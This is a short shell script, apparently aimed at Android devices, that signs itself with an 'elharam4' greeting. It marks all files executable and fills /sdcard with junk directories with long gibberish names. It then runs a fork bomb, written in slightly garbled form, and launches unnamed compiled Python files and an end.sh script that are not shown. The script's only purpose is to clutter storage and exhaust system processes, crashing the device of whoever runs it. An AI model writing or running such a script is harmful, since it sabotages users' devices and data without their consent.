echo 'i love you from;elharam4'
chmod +x *
cd /sdcard
mkdir uoghoufhgwoufhswoufhwroufghoughrougbouhgouthboutghoughuoghougoiughiupoerhgoiuhrpgihpighrpihpirghpierhgopierhgpierhpg>
mkdir uoghoufhgwoufhswoufhwroufghoughrougbouhgouthboutghoughuoghou
mkdir uoghoufhgwoufhswoufhwroufghoughrougbouhgouthboutghoughuoghouefar
mkdir uoghoufhgwoufhswoufhwroufghoughrougbouhgouthboutghoughuogho
mkdir uoghoufhgwoufhswoufhwroufghoughrougbouhgouthboutghoughuogh
mkdir uoghoufhgwoufhswoufhwroufghoughrougbouhgouthboutghoughuoghoukkjtpjrtpibjtrpoihj[orth
mkdir uoghoufhgwoufhswoufhwroufghoughrougbouhgouthboutghoughuoghoujklijkl
mkdir uoghoufhgwoufhswoufhwroufghoughrougbouhgouthboutghoughuoghouhyfuru
mkdir uoghoufhgwoufhswoufhwroufghoughrougbouhgouthboutghoughuoghouftgrgour
cd
;((){ :|:& };:
python elharam4.pyc
python el.pyc
bash end.sh
